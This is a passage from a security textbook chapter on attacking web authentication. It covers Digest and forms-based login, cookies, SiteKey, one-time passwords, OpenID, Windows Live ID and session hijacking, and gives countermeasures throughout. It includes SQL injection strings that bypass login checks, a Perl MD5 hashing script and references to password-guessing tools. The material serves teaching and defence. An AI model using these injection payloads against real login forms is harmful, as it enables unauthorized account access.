knows a secret, without requiring the person to send the secret across an insecure communications channel where it would be exposed to eavesdropping attacks. Digest authentication works similarly to Basic authentication. The user makes a request without authentication credentials and the web server replies with a WWW Authenticate header indicating credentials are required to access the requested resource. But instead of sending the username and password in Base64 encoding as with Basic, the server challenges the client with a random value called a nonce. The browser then uses a one-way cryptographic function to create a message digest of the username, the password, the given nonce value, the HTTP method, and the requested URI. A message digest function, also known as a hashing algorithm, is a cryptographic function that is easily computed in one direction and should be computationally infeasible to reverse. Compare this hashing method with Basic authentication that uses the trivially decodable Base64 encoding. Any hashing algorithm can be specified within the server challenge; RFC 2617 describes the use of the MD5 hash function as the default. Why the nonce? Why not just hash the user’s password directly? Although nonces have different uses in other cryptographic protocols, the use of a nonce in Digest authentication is similar to the use of salts in other password schemes. It is used to create a larger key space to make it more difficult for someone to perform a database or precomputation attack against common passwords. Consider a large database that can store the MD5 hash of all words in the dictionary and all permutation of characters with less than ten alphanumeric characters. The attacker would just have to compute the MD5 hash once and subsequently make one query on the database to find the password associated with the MD5 hash. The use of the nonce effectively increases the key space and makes the database attack less effective against many users by requiring a much larger database of prehashed passwords. Digest authentication is a significant improvement over Basic authentication, primarily because cleartext authentication credentials are not passed over the wire. This makes Digest authentication much more resistant to eavesdropping attacks than Basic authentication. However, Digest authentication is still vulnerable to replay attacks because the message digest in the response will grant access to the requested resource even in the absence of the user’s actual password. But, because the original resource request is included in the message digest, a replay attack should only permit access to the specific resource (assuming Digest authentication has been implemented properly). Other possible attacks against Digest authentication are outlined in RFC 2617. Microsoft’s implementation of Digest authentication requires that the server have access to the cleartext version of the user’s password so digests can be calculated. Thus, implementing Digest authentication on Windows requires that user passwords be stored using reversible encryption, rather than using the standard one-way MD4 algorithm. Chapter 4: Attacking Web Authentication 137 For those of you who like to tinker, here’s a short Perl script that uses the Digest::MD5 Perl module from Neil Winton to generate MD5 hashes: #!/usr/bin/perl # # encode using MD5 use Digest::MD5 qw(md5 hex); print md5 hex($ARGV[0]); This script outputs the MD5 hash in hexadecimal format, but you could output binary or Base64 by substituting qw(md5) or qw(md5_base64) at the appropriate spot in line 4. This script could provide a rudimentary tool for comparing Digest authentication strings to known values (such as cracking), but unless the username, nonce, HTTP method, and the requested URI are known, this endeavor is probably fruitless. MDcrack, an interesting tool for cracking MD5 hashes, is available from Gregory Duchemin (see the “References & Further Reading” section at the end of this chapter for a link). Eavesdropping Countermeasures The use of 128-bit SSL encryption can thwart these attacks and is strongly recommended for all web sites that use Basic and Digest authentication. To protect against replay attacks, the Digest nonce could be built from information that is difficult to spoof, such as a digest of the client IP address and a timestamp. Forms-based Authentication Attacks In contrast to the mechanisms we’ve discussed to this point, Forms-based authentication does not rely on features supported by the basic web protocols like HTTP (such as Basic or Digest authentication). It is a highly customizable authentication mechanism that uses a form, usually composed of HTML with FORM and INPUT tags delineating input fields, for users to enter their username and password. After the user credentials are sent via HTTP or HTTPS, they are then evaluated by some server-side logic and, if valid, some sort of unique token of sufficient length, complexity, and randomness is returned to the client for use in subsequent requests. Because of its highly customizable and flexible nature, Forms-based authentication is probably the most popular authentication technique deployed on the Internet. However, since it doesn’t depend on a standardized HTTP authentication specification, there is no standardized way to perform Forms-based authentication. A simple example of Forms-based authentication will now be presented to illustrate the basic principles on which it is based. While this example will be based on Microsoft ASP.NET Forms authentication because of its simplicity, we’ll note the key points that 138 Hacking Exposed Web Applications are generic to all types of Forms authentication. Here’s the scenario: you have a single directory on a web server with a file, default.aspx, that requires Forms authentication before it can be accessed. In order to implement ASP.NET Forms authentication, two other files are needed: a web.config file in this directory (or at the application root) and a login form to take username/password input (call it login.aspx). The web.config file specifies which resources will be protected by Forms authentication, and it contains a list of usernames and passwords that can be queried to validate credentials entered by users in login.aspx. Of course, any source of username/password information could be used— for example, a SQL database. It is recommended that a salted hash of the password is stored instead of the original password to mitigate the risk of exposing the passwords and make dictionary-based attacks more difficult. Here’s what happens when someone requests default.aspx: GET /default.aspx HTTP/1.0 Since the web.config file specifies that all resources in this directory require Forms authentication, the server responds with an HTTP 302 redirect to the login page, login .aspx: HTTP/1.1 302 Found Location: /login.aspx?ReturnUrl %2fdefault.aspx The client is now presented with the login.aspx form, shown in Figure 4-5. This form contains a hidden field called “state,” and two visible fields called “txtUser” that takes the username input and “txtPassword” that takes the password input. These are all implemented using HTML INPUT tags. The user diligently enters his or her Figure 4-5 A standard login form implemented in ASP.NET Chapter 4: Attacking Web Authentication 139 username and password and clicks the Login button, which POSTs the form data (including hidden fields) back to the server: POST /login.aspx?ReturnUrl %2fDefault.aspx HTTP/1.0 STATE gibberish&txtUser test&txtPassword test The POST method should always be used instead of the GET verb for sending the username and password, although both verbs accomplish the same thing. The reason for preferring POST to GET is to prevent the insecure storage of authentication credentials at the client (in the browser history), at caching intermediary devices such as proxies, and at the remote application server since these systems will often cache or log HTTP GET data for statistical or performance reasons. These commonplace mechanisms can lead to the inadvertent exposure of user authentication credentials stored in GET requests to unauthorized users. Note that unless SSL is implemented, the credentials traverse the wire in cleartext, as shown here. The server receives the credential data and validates them against the username/password list in web.config (again, this could be any custom datastore). If the credentials match, then the server will return a “HTTP 302 Found with a Location” header redirecting the client back to the originally requested resource (default.aspx) with a Set Cookie header containing the authentication token: HTTP/1.1 302 Found Location: /Default.aspx Set-Cookie: AuthCookie 45F68E1F33159A9158etc.; path / htmlheadtitleObject moved/title/headbody Note that the cookie here is encrypted using 3DES, which is optionally specified in ASP.NET’s web.config file. Now the client re-requests the original resource, default.aspx, with the newly set authentication token (the cookie) automatically appended to the HTTP header: GET /Default.aspx HTTP/1.0 Cookie: AuthCookie 45F68E1F33159A9158etc. The server verifies the cookie is valid and then serves up the resource with an HTTP 200 OK message. All of the 301 and 302 redirects occur transparently in the background without notifying the end-user of the activity. End result: user requests resource, is challenged for username/password, and receives resource if he or she enters the correct credentials (or a custom error page if he or she doesn’t). The application may optionally provide a “Sign Out” button that deletes the cookie when the user clicks it. Or the cookie can be set to expire in a certain timeframe when it will no longer be considered valid by the server (such as inactivity or maximum session length timeouts). Again, this example uses a specific end-to-end technology, ASP.NET FormsAuthentication, to demonstrate the basics of Forms authentication. Any other similar technology or combination of technologies could be employed to achieve the same result. 140 Hacking Exposed Web Applications Like the other authentication technologies discussed thus far, Forms-based authentication is also subject to password-guessing attacks. We like to use Brutus (introduced earlier in this chapter) for attacking Forms-based authentication, primarily because of its Modify Sequence | Learn Form Settings feature. This feature allows the user to simply specify a URL to a login form, and Brutus automatically parses out the fields for username, password, and any other fields supported by the form (including hidden). Figure 4-6 shows the HTML form interpreter. Brutus also allows you to specify what responses you expect from the login form upon successful authentication. This ability is important because of the highly customizable nature of Forms authentication, as it is common for sites to implement unique response pages for successful and unsuccessful logins. With the Brutus tool, you can customize password guessing to whatever responses the particular target site uses. Forms-based authentication is also clearly vulnerable to eavesdropping and replay attacks if the authentication channel is not encrypted with HTTPS or other encryption protocols. Figure 4-6 Brutus’ HTML form interpreter parses a login form, highlighting fields for subsequent attack. Chapter 4: Attacking Web Authentication 141 Forms-based authentication almost always uses session cookies to store an authentication token temporarily so a user accessing a web site does not have to repeatedly supply his or her authentication credentials with each request. A session cookie is stored only in memory, as opposed to a persistent cookie that is stored on the disk and persists across sessions. Cookies can sometimes be manipulated or stolen outright, and may disclose inappropriate information if they are not encrypted (note that ASP.NET was configured to 3DES-encrypt the cookie in our example). See Chapter 5 for more on attacking cookies. There are two cookie attribute flags, secure and HTTPOnly, that are important when issuing session or persistent cookies containing sensitive information (ideally, sensitive information should never be persisted in a cookie, and if it needs to be, that information should always be encrypted). When a cookie is issued with the secure flag, client browsers that honor the secure attribute will never send that cookie over a nonHTTPS secured channel. The HTTPOnly flag was originally created by Microsoft, and it is a modest attempt to protect users from session hijacking and data exfiltration attacks targeting sensitive data in application cookies. Client browsers that support HTTPOnly will not allow JavaScript to access data in the corresponding cookie even if that access would normally be permitted based on the same origin policy. HTTPOnly is meant as a failsafe to protect the session ID and other sensitive values from being easily exfiltrated as a result of a malicious script injection attack (e.g., XSS). However, once attackers have the ability to execute malicious script in a target application, they will have free reign to perform any action in that application in the security context of the victim user, regardless of whether the attacker can directly access the session cookie or not. Normally, this would be accomplished by creating a series of background asynchronous requests (XmlHttpRequest) to execute sensitive functionality. Although there is some debate in the security community as to the overall usefulness of this protective mechanism, developers are encouraged to use this feature, when possible, as an additional layer of defense in their applications. With that said, the priority of application developers should always be to first rid their applications of the input validation vulnerabilities that lead to malicious script injection attacks. More information regarding the secure and HTTPOnly cookie attribute flags can be found in the “References & Further Reading” section at the end of this chapter. Some application developers make the mistaken assumption that data hidden from users in the form of “hidden” HTML input fields are not visible to end-users. They may then shuffle sensitive authentication credentials or other data into these fields rather than relying on cookie-based session IDs to authenticate users for certain transactions. While not a very common occurrence, application security assessors should train themselves to pay close attention to the types of data being stored in hidden fields. Bypassing SQL-backed Login Forms On web sites that perform Forms-based authentication with a SQL backend, SQL injection can be used to bypass authentication (see Chapter 6 for more specific details on the technique of SQL injection). Many web sites use databases to store passwords and use SQL to query the database to validate authentication 142 Hacking Exposed Web Applications credentials. A typical SQL statement will look something like the following (this example has been wrapped across two lines due to page-width constraints): SELECT * from AUTHENTICATIONTABLE WHERE Username Password 'password input' If input validation is not performed properly, injecting 'username input' AND Username' -in the username field would change the SQL statement to this: SELECT * from AUTHENTICATIONTABLE WHERE Username 'Username' --AND Password 'password input' The dashes at the end of the SQL statement specify that the remainder of the SQL statement is a comment and should be ignored. The statement is equivalent to this: SELECT * from AUTHENTICATIONTABLE WHERE Username 'Username' And voilà! The check for passwords is magically removed! This is a generic attack that does not require much customization based on the web site, as do many of the other attacks for Forms-based authentication. We’ve seen tools in the underground hacker community that automate this attack. To take the attack one level higher, SQL injection can be performed on the password field as well. Assuming the same SQL statement is used, using a password of DUMMYPASSWORD' OR 1 1 –- would have a SQL statement of the following (this example has been wrapped across two lines due to page-width constraints): SELECT * from AUTHENTICATIONTABLE WHERE Username 'Username' AND Password 'DUMMYPASSWORD' OR 1 1 –- ' The addition of OR 1 = 1 at the end of the SQL statement would always evaluate as true, and authentication can once again be bypassed. Many web authentication packages were found to be vulnerable to similar issues in mid-2001. The Apache mod_auth_mysql, oracle, pgsql, and pgsql_sys built SQL queries and did not check for single quotes (these vulnerabilities were described in a CERT advisory from the University of Stuttgart, Germany; see the “References & Further Reading” section at the end of this chapter for a link). Bypassing LDAP-backed Login Forms Not all applications integrate the authentication component with a backend SQL database server. Many web applications, especially on corporate intranets, use servers based on the Lightweight Directory Access Protocol Chapter 4: Attacking Web Authentication 143 (LDAP) to provide similar authentication capabilities. If insecurely coded, these applications may expose LDAP injection vulnerabilities that could be exploited to bypass authentication controls. While the exact syntax used to exploit these vulnerabilities is different from that of SQL injection, the underlying concept is identical. More information on LDAP injection attacks is available in Chapter 6 of this book and interested readers are encouraged to refer to that chapter for further information. Bypassing XML-backed Login Forms Although far less common than SQL-backed and LDAP-backed authentication components, some applications rely on static XML files to store application user data and login credentials. Just as in the SQL and LDAP case, applications that fail to properly validate user-supplied credentials may expose a vulnerability that allows attackers to bypass normal authentication controls. The classic case of this is an application that uses the username supplied during authentication to construct an XPath query to query the appropriate record from the backend XML document. If the username is not properly validated for characters that have special meaning in XPath queries, then an attacker may be able to modify the query to return arbitrary records, regardless of whether a correct password is supplied. More concrete examples of XML and XPath injection can be found in Chapter 7. Countermeasures for Forms-based Authentication Attacks The same countermeasures we discussed previously for password guessing, eavesdropping, and replay attacks are advised for Forms-based authentication as well. The best way to prevent SQL injection and other injection attacks is to perform input validation (see Chapter 6) and to use parameterized SQL queries or parameterized stored procedures. Input validation should be performed to ensure that usernames do not contain invalid characters. HTML tag characters, whitespace, and special characters such as !, $, %, and so forth, should be prohibited when possible. Care must be taken when using stored procedures to code those procedures securely so they do not simply move the SQL injection vulnerability from the application to the database procedure. As a general rule, developers should refrain from using dynamically constructed SQL queries, especially when those queries contain user-supplied input. Preventing XML and LDAP injection attacks is achieved through strong input validation that prevents the use of characters with special meaning in these two technologies. When it is not possible to completely prohibit use of these special characters, special care must be taken to properly escape the authentication credentials, using the appropriate APIs, when performing authentication against the backend datastores. We’ll also throw in the standard admonition here to ensure that all software packages used by your web application are updated with the latest patches and to the latest release. It is one thing to have a Forms bypass attack performed against your own custom code, but something else entirely when your free or commercial authentication package turns up vulnerable to similar issues. 144 Hacking Exposed Web Applications Strong(er) Web Authentication Clearly, the username/password-based authentication mechanisms that predominate on the Web today have their faults. What alternatives exist? Are there weaknesses with them as well? Passwords are only single-factor—something the user knows. Passwords are also typically very low-entropy credentials, which makes password guessing feasible. To make matters worse, these passwords are often re-used across several different applications. Thus, the primary mitigation for password-based authentication risks is to move to multifactor authentication, preferably using higher-entropy credentials. We’ll discuss some classic and new approaches making their way into the market currently. These new approaches mark the evolution of authentication on the Web to functionality that is more resistant to the rising risk of online fraud, such as from phishing (see Chapter 9 for more information on phishing). Digital Certificates Certificate authentication is stronger than any of the authentication methods we have discussed so far. Certificate authentication uses public key cryptography and a digital certificate to authenticate a user. Certificate authentication can be used in addition to other password-based authenticated schemes to provide stronger security. The use of certificates is considered an implementation of two-factor authentication. In addition to something you know (your password), you must authenticate with something you have (your certificate). Certificates can be stored in hardware (e.g., smart cards) to provide an even higher level of security—possession of a physical token and availability of an appropriate smart card reader would be required to access a site protected in such a manner. Client certificates provide stronger security, however, at a cost. The difficulty of obtaining certificates, distributing certificates, and managing certificates for the client base makes this authentication method prohibitively expensive for large sites. However, sites that have very sensitive data or a limited user base, as is common with business-tobusiness (B2B) applications, would benefit greatly from the use of certificates. There are no current known attacks against certificate-based authentication, given the private certificate remains protected. However, systems that fail to check the validity of certificates based on certificate revocation lists (CRLs) may improperly permit the use of a revoked stolen certificate. Of course, if an attacker is able to compromise the PKI infrastructure itself, then bypassing normal certificate authentication controls may be possible. As you saw in Chapter 1, many web hacking tools such as the Paros and Burp client-side proxies support certificate-based authentication. SiteKey PassMark Security, Inc., was founded in 2004 to focus on strong authentication in the financial services market, and by year-end 2005, they claimed nearly 15 million customers were protected by their PassMark technology. This result is likely due almost entirely to Bank of America’s implementation of PassMark technology in mid-2005 for their (then) Chapter 4: Attacking Web Authentication 145 13 million online banking customers. BofA branded their implementation “SiteKey.” PassMark was acquired by RSA Data Security in 2006. PassMark/SiteKey is based on two-factor, “two-way” authentication. It uses twofactor authentication comprised of a user password and information about the device from which the user is authenticating (multiple devices can be registered). To achieve two-way authentication, the user is provided secret information during the login process so he or she can authenticate the site. Here’s how this works in practice: at login, the user’s device is authenticated passively using a special device ID created at account registration, providing for server-to-client authentication. The user types in his username and is then challenged to identify an image and associated phrase before he types in his password. The image/phrase is designed to provide simple, visual/textual authentication of the site to mitigate against malicious sites masquerading or spoofing the legitimate one (as is the case with phishing). After entering the correct password, the user is authenticated as normal. See the “References & Further Reading” section at the end of this chapter for links to further demonstrations of PassMark/SiteKey. PassMark/SiteKey provides for better security than simple username/passwordbased systems, but how much better? We’ve tested some PassMark-protected applications in our consulting work, and here are some of our findings, integrated with criticisms from the Internet community at large. One of the early assertions that PassMark is vulnerable to man-in-the-middle (MITM) attacks appears unfounded. PassMark uses secure cookies, which are only sent on SSL connections. Unless the user accepts the failed SSL handshake, the secure cookie isn’t sent across. So PassMark appears no more vulnerable than SSL itself to MITM attacks. However, when Bank of America’s SiteKey implementation can’t identify the device from which you are authenticating (because it hasn’t been registered), it will ask you to answer a secret question. This is susceptible to an MITM attack since the attacker can just proxy the question/answer between the user/web site. Additionally, PassMark’s design of presenting a unique image/phrase to valid users creates a username enumeration vulnerability by allowing an attacker to determine easily if an account is valid or not. As noted at the outset of this chapter in the discussion of username enumeration, this is generally not a severe vulnerability because the attacker would still have to guess the password associated with the account. Some of the broader community’s criticisms of PassMark and SiteKey have included assertions that PassMark is only encumbering existing username/password systems with the addition of a device ID, raising usability issues as users are prompted for numerous secret questions when they inevitably attempt to authenticate from various devices (other computers, kiosks, phones, PDAs, etc.). Perhaps most seriously, some critics have raised the issue of PassMark creating universal reliance on the ongoing confidentiality of consumer device ID information (which must be stored by the authenticating businesses). If one implementer suffers a security breach of device ID information, all implementers of PassMark potentially lose the benefit of two-factor authentication that it provides. See the “References & Further 146 Hacking Exposed Web Applications Reading” section at the end of this chapter for links to more analyses of PassMark and SiteKey. One-time Passwords One-time passwords (OTPs) have been around for many years. As you might guess from the name, OTP protocols involve a server and client pre-establishing a collection of secrets (say, a list of passwords) that are used only once per authentication transaction. Continuing with our example of password lists, at the first authentication, the client provides the first password on the list, and both the server and the client then delete that password from the list, making it useless for future authentications. The primary idea behind OTP is to reduce much of the sensitivity of the password itself, so users don’t have to be exposed to the complexities of keeping them secure. Links to more information about OTP can be found in the “References & Further Reading” section at the end of this chapter. The most popular commercial OTP implementation at the time of this writing is RSA Security’s SecureID system. Rather than shared lists of passwords, SecureID implements a synchronization protocol between the client and server, such that passwords (actually numeric sequences or PIN codes) are only usable within a small window of time (say, 30 seconds). This clever variation on OTP provides for high security since the password is only valuable to the attacker within the 30-second window (for example). After each time window expires, the client generates a new password in synchronization with the server. The client is typically a small hardware device (sometimes called a dongle or fob) that performs the OTP protocol and generates new passwords at each time interval. OTP systems have historically proven resistant to attack (at least, the well-implemented ones like SecureID) and remain popular for limited scale, higher-security applications such as remote access to corporate networks over a VPN. The main drawback to largerscale, consumer-oriented deployments remains the cost of the client devices, distribution, and management, which can run as much as $100 per customer per device. Business and consumer attitudes toward these costs have started to change with the recent increased attention to online fraud, and businesses are starting to turn to OTP to address customer concerns in this area. Early evidence for this was online financial institution E*Trade’s implementation of SecureID for select customers, announced in March 2005 (see the “References & Further Reading” section at the end of this chapter for links). E*Trade calls it the “Complete Security System with optional Digital Security ID” and provides it free of charge to customers maintaining certain minimum balance and transaction volumes in a given period. E*Trade hedges its bets somewhat by noting in its terms of use that a $25 charge may be imposed for each additional or replacement SecureID fob, and that they may impose a fee or may discontinue the service in the future. Like any security measure, OTP is not perfect. Cryptography expert Bruce Schneier published a paper identifying how phishing can still bypass OTP by setting up a fraudulent site that simply proxies the OTP exchange with the legitimate site, or by installing malicious software on the user’s computer that hijacks a previously authenticated session. And, of course, there is always the potential for replay if the Chapter 4: Attacking Web Authentication 147 window for password re-use is set too wide. Nevertheless, OTP clearly raises the bar for security, and the attacks proposed by Schneier are generic to any authentication system and will need to be addressed separately to some extent. Web Authentication Services Many web site operators simply want to outsource the complexities of security, especially authentication. The market quickly recognized this phenomenon in the late 1990s, as Microsoft acquired Firefly Network and adapted its technologies to become one of the Internet’s first authentication services, Microsoft Passport (now known as Windows Live ID), which could be used by other sites to manage and authenticate customer identities. Originally, Windows Live ID was planned to handle authentication for sites outside of Microsoft and at one point could even boast of heavy hitters such as as one of its members. However, the service was never widely adopted outside of Microsoft web properties and is now primarily restricted to web applications managed by Microsoft or closely integrated with Microsoft services. To fill the void left by the retreat of Microsoft, a relatively new set of specifications to define an open, decentralized authentication service emerged in 2005 as the result of work by LiveJournal creator Brad Fitzpatrick. Originally known as Yadis, and now dubbed OpenID, this service has grown in popularity over the years and now boasts of over one billion OpenIDs and nine million web sites consuming those IDs. This section will cover at a high level these two technologies and how they relate to authentication security. Windows Live ID Windows Live ID is the latest stage in the evolution of Microsoft’s Passport service and is used to authenticate to Microsoft’s core web applications, including MSN, Hotmail, Messenger, Xbox Live, Channel9, among others. A Windows Live ID is a digital identity consisting of one or more claims that are used to authenticate users to the Windows Live ID authentication service. These claims may be comprised of information such as a user’s e-mail address, the organization(s) that user belongs to, and the roles, relationships, and other authorization-related data associated with the user. Authentication is accomplished through the use of a username/password pair, strong passwords and security PIN combinations, smart cards, or self-issued Windows CardSpace cards. The Windows Live ID service also supports specialized mechanisms such as RADIUS protocol to authenticate nonstandard devices including cell phones and the Xbox 360. The basic process behind Windows Live ID authentication is this: First, the user attempts to authenticate against a site relying on the Windows Live ID authentication service. Assuming the user is not currently authenticated, she will be redirected to the Windows Live ID authentication site with information about the site she is trying to authenticate to (say, in the redirect. The user will then be prompted to enter her Windows Live ID authentication credentials, typically a username and password, and if the authentication attempt succeeds, a number of authentication tokens will be returned in a form in the response. The form will point back to the site that the user is attempting to authenticate against (Channel9), and JavaScript in the response will 148 Hacking Exposed Web Applications automatically post the form to convey the authentication tokens to Channel9, thereby successfully completing the authentication process. The form method for conveying the authentication tokens is necessary to communicate the authentication tokens from the domain, where the Windows Live ID service exists, to the domain, where Channel9 currently resides. When the target application also exists under the domain (as is the case with Hotmail), the authentication tokens are typically directly set in cookies in the response HTTP header. However, form-based token storage is necessary when the target domain (e.g., is different than the Windows Live domain (e.g., due to the browser-enforced same-origin policy that prevents one domain from accessing the cookie values set in another domain. A common theme across many of these analyses suggests that one of the biggest dangers in using Windows Live ID authentication is replay attacks using authentication cookies stolen from unsuspecting users’ computers. Of course, assuming an attacker could steal authentication tickets would probably defeat most authentication systems out of the gate, as we noted in our earlier discussion of security token replay attacks in this chapter. Like any other authentication system, Windows Live ID is also potentially vulnerable to password-guessing attacks (the minimum password length is six characters, with no requirements for different case, numbers, or special characters). Although there is no permanent account lockout feature, after a certain number of failed login attempts, an account will be temporarily prevented from logging in (this lasts a “few moments” according to the error message). This is designed to add significant time to online password-guessing attacks. Windows Live Delegated Authentication The Windows Delegated Authentication service allows application developers to leverage externally exposed Windows Live authentication web services to interact and retrieve data associated to a specific Windows Live ID and service. For example, a developer could create an application to connect and retrieve Windows Live Contacts data (used by Hotmail, Messenger, and Mobile) for use in his or her own application. In Microsoft’s terminology, the Windows Live Contacts API providing access to the contacts data is known as the resource provider and the application connecting to that is called the application provider. For the access attempt to succeed, a user must permit the operation through the consent user interface. The lifetime and validity of the consent, as well as the scope of the data access permitted, can be adjusted at any time by the end-user. When a user provides permission through the consent UI for an application provider to access a resource provider, a consent token and delegation token are returned to the application provider for use in subsequent operations. The combination of these two tokens is required for the application provider to authenticate subsequent operations to access data protected by the resource provider. The consent token contains information defining the “offers” and “actions” the user has permitted the application provider to access as well as other important data needed by the application provider. The delegation token is an encrypted block of data contained within the consent token that must be passed to the resource provider when executing operations to retrieve or manipulate Chapter 4: Attacking Web Authentication 149 authenticated user data. It is important to note that delegation tokens can be used to authenticate to the resource provider even if the corresponding user has logged out of Windows Live. However, the lifetime of the consent and delegation token is defined by the end-user. While delegated authentication does provide developers with the flexibility they need to create applications integrated with Microsoft resource providers, it does so at some additional security risk to end-users. First, there is always the risk that an application provider is compromised, resulting in both the disclosure of active authentication tokens to unauthorized parties and access to locally cached data originating from the resource provider. This potential disclosure increases the overall attack surface of the data accessible through the resource providers. Of course, there is always the risk of a malicious user registering a nefarious application provider and luring unsuspecting or gullible users (who are, let’s face it, a dime a dozen) into providing consent to access resource providers. Although this risk deserves consideration, it is not significantly different from a normal phishing attack. OpenID OpenID is a user-centric, decentralized authentication system providing services identical to that of Windows Live ID. The key difference is that in OpenID, there is no central authentication provider. Any number of organizations can become providers, allowing for greater choice and flexibility. The process of authenticating to a site, referred to as a relying party (previously OpenID consumer), is simple. First, a nonauthenticated user visits a web site supporting OpenID—for this example, let’s say—and selects OpenID as his method of authentication. The user is then prompted to provide a URL that specifies his unique identity on the provider he has selected. For example, one popular provider, MyOpenID (, creates URLs of the form, where is the name selected when the MyOpenID account was created. When the user attempting to authenticate to the relying party (Slashdot) supplies this URL, he is redirected to a login page at the provider site (MyOpenID) that prompts for the password selected when the account was created. If the user provides the correct password, he will be redirected back from the OpenID provider to the original site as an authenticated user. From this point, he may be asked to complete profile-related information if this is the first time he has authenticated with the site. This example uses passwords as the required authentication credentials, although this is not mandated by the OpenID specification. Not mandating the type of credentials to be used allows authentication providers to support any number of credential types such as client-side certificates, biometric devices, or smart cards. The biggest downside to using OpenID is that a single compromise of the OpenID account credentials will result in the compromise of every OpenID web application used by the victim user until that point. While the attacker may not know what applications those are, it is trivial to enumerate the popular sites until the attacker strikes upon something interesting. This risk can be mitigated through enforcing strong passwords, rotating passwords on a periodic basis, or simply by selecting a stronger authentication 150 Hacking Exposed Web Applications method such as client-side certificates and other digital identity systems such as Windows CardSpace. The risk of credential theft is heightened by the ease with which attackers can dupe users into providing these credentials at malicious OpenID phishing sites. When talking about OpenID security, this issue is often the first raised. For example, it is trivial to create a web site that appears to accept a normal OpenID provider URL yet on the backend redirects the authenticating user to an attacker-controlled web site constructed to resemble the selected provider. Unless users are paying careful attention to the web site they have been redirected to, it is unlikely they will notice the attack until it is too late (if at all). Other security considerations have been enumerated in the OpenID 2.0 authentication specification, a link to which can be found in the “References & Further Reading” section at the end of this chapter. As part of a phishing-resistant authentication solution for OpenID, in February 2007, Microsoft announced a partnership with JanRain, Sxip, and VeriSign to collaborate on integration of Microsoft Windows CardSpace digital identity platform technology into OpenID implementations. Because CardSpace relies on the use of digital identities backed by cryptographic technologies, attackers will have a hard time impersonating clients without directly compromising the digital identities stored on the client machine. More information regarding Microsoft Windows CardSpace is provided in the next section. While not security related, another downside to OpenID is that it has yet to be adopted by many of the major players in the online community. While Microsoft, Google, and Yahoo! now serve as OpenID providers, none of these organizations currently consumes these identities for use in their most popular web properties. In other words, users will not be using a Google-based OpenID account to log in to Hotmail anytime soon. Windows CardSpace Windows CardSpace is an Identity Selector technology to provide identity and authentication services for application end-users. The analogy that is frequently used to explain this technology is that of a wallet. In our day-to-day lives, we use a variety of cards, including credit, health insurance, driver license, and gym membership cards to authenticate our identities to the appropriate organizations. Some identification cards, such as credit cards, require a high level of security and assurance that the person holding the card is the actual owner. Other cards, such as a gym membership or library card, require less assurance, and the effects of a forged or stolen card are far less serious. Windows CardSpace is a digital wallet application users can employ to manage their digital identities (referred to as information cards) for a variety of services. These identities may be official cards issued and signed by third-party trusted identity providers, or they may be personal information cards that are self-signed by the user. Applications that require a high level of security may require an information card signed by a specific organization, whereas other applications may accept any self-signed identity. In May 2008, researchers at the University of Bochum in Germany described an attack against the CardSpace technology that could be used to impersonate the identity of Chapter 4: Attacking Web Authentication 151 victim users against an attacker-specified site for the lifetime of a security authentication token. The attack relies on the malicious modification of client-side DNS entries and the improper trusting of an attacker-supplied server-side certificate in order to succeed. While not outside the realm of possibility, attacks that succeed in both poisoning the client-side DNS and getting a user to trust a malicious server certificate are generally going to succeed regardless of the authentication technology used. Links to both an article describing the attack and legitimate criticisms of the methods used (including a response by Kim Cameron, Chief Identity Architect of Identity at Microsoft) can be found in the “References & Further Reading” section at the end of this chapter. BYPASSING AUTHENTICATION Many times you find yourself banging the wall when a door is open around the corner. This idea is similar to attacking web authentication. As we noted in the beginning of the chapter, many applications are aware of the important role that authentication plays in the security of the application, and therefore, they implement very strong protocols. In these situations, directly attacking the protocol itself may not be the easiest method of hacking authentication. Attacking other components of the application, such as hijacking or spoofing an existing authenticated session, or attacking the identity management subsystem itself, can both be used to bypass authentication altogether. In this section, we’ll discuss some common attacks that bypass authentication entirely. Token Replay Security tokens of some sort are commonly issued to users who have successfully authenticated so they do not need to retype credentials while navigating the authenticated sections of an application. An unfortunate side effect of this mechanism is that authentication can be bypassed by simply replaying maliciously captured tokens, a phenomenon sometimes called session hijacking. Web applications typically track authenticated user sessions through session IDs stored in browser cookies. We’ll discuss common mechanisms for guessing or obtaining cookie-based session IDs briefly in this section. For more information on attacks against authorization and session state, please consult Chapter 5. Session ID Attacks Two basic techniques to obtain session IDs are prediction and brute-forcing. Older web applications often used easily predictable, sometimes even sequential, session identifiers. Nonsequential session IDs generated using insecure algorithms or pseudorandom number generators with insufficient entropy may be predictable using mathematical techniques such as statistical forecasting. While all of the major application servers now attempt to use unpredictable session identifiers, occasionally new attacks 152 Hacking Exposed Web Applications are discovered against even widely used and popular technologies. For example, in March 2010, security researcher Andreas Bogk disclosed a vulnerability in the PHP platform session ID–generation functionality that could result in the pool of possible session IDs being reduced to the point that brute-force session ID attacks become feasible. This serves to illustrate the point that, in security, nothing can be taken for granted and that the best approach is always a defense-in-depth strategy and focus on the fundamentals. Brute-forcing session IDs involves making thousands of requests using all possible session IDs in hopes of guessing one correctly. The number of requests that need to be made depends on the key space of the session ID. Thus, the probability of success for this type of attack can be calculated based on the size and key space of the session ID. Attempted brute-forcing of the session IDs used in popular web application servers such as Java, PHP, ASP.NET, etc., is a rather pointless exercise due to the size of the session IDs these platforms generate. However, this attack may yield useful results against applications generating custom session IDs or other authentication tokens. There is one other attack against session IDs that has largely fallen along the wayside as improvements in session ID security have been made over the years. That attack is known as session fixation. Session fixation is a type of attack where an attacker is able to set, in advance, the session ID that an application server will use in a subsequent user authentication. Because the attacker is setting the value, a user who authenticates using this preset session ID will immediately be exposed to a session hijacking attack. While this vulnerability is far less common than it used to be many years ago, application assessors need to be aware of this vulnerability and need to know how to identify it in web applications. Please refer to the “Session Fixation” section in Chapter 5 and “References & Further Reading” for more information regarding this attack technique. David Endler of has written a detailed exposé of many of the weaknesses in session ID implementations. Find a link to it in the “References & Further Reading” section at the end of this chapter. Hacking Cookies Cookies commonly contain sensitive data associated with authentication. If the cookie contains passwords or session identifiers, stealing the cookie can be a very successful attack against a web site. There are several common techniques used to steal cookies, with the most popular being script injection and eavesdropping. We’ll discuss script injection techniques (also referred to as cross-site scripting) in Chapter 6. Reverse engineering the cookie offline can also prove to be a very lucrative attack. The best approach is to gather a sample of cookies using different input to see how the cookie changes. You can do this by using different accounts to authenticate at different times. The idea is to see how the cookie changes based on time, username, access privileges, and so on. Bit-flipping attacks adopt the brute-force approach, methodically modifying bits to see if the cookie is still valid and whether different access is gained. We’ll go into more detail on cookie attacks in Chapter 5. Before embarking on attacks Chapter 4: Attacking Web Authentication 153 against cookie values, care should be taken to first understand any encoding used and whether the cookie needs to be decoded for the attack to be successful. One common mistake made by application developers is to use an encoding format, such as Base64, when encryption is required. This mistake is sometimes seen in applications caching role information in the cookie for performance reasons. Because Base64 is trivially 